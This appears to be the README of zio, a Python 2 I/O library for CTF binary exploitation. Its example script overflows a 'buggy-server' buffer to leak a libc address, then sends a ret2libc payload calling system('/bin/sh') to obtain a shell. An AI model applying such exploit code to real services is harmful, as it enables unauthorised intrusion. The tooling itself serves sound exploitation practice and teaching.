zio is an easy-to-use io library for pwning development, supporting an unified interface for local process pwning and TCP socket io.
The primary goal of zio is to provide unified io interface between process stdin/stdout and TCP socket io. So when you have done local pwning development, you only need to change the io target to pwn the remote server.
The following code illustrate the basic idea.
from zio import *
if you_are_debugging_local_server_binary:
io = zio('./buggy-server') # used for local pwning development
elif you_are_pwning_remote_server:
io = zio(('', 1337)) # used to exploit remote service
# hey, we got an interactive shell!
zio use SATA License (Star And Thank Author License), so you have to star this project before using. Read the license carefully.
- Linux or OSX
- Python 2.6, 2.7
- termcolor (optional, for color support)
- $ pip install termcolor
This is a single-file project so in most cases you can just download zio.py and start using.
pip is also supported, so you can also install by running
$ pip2 install termcolor # for color support, optional
$ pip2 install zio
from zio import *
io = zio('./buggy-server')
# io = zio((pwn.server, 1337))
for i in xrange(1337):
io.writeline('add ' + str(i))
io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
io.read_until('A' * 49)
libc_base = l32(io.read(4)) - 0x1a9960
libc_system = libc_base + 0x3ea70
libc_binsh = libc_base + 0x15fcbf
payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
io.write('info ' + payload + "\nshow\nexit\n")
# We've got a shell;-)
To be added... Please wait...
Just don't read '\n' or '\r', use readline()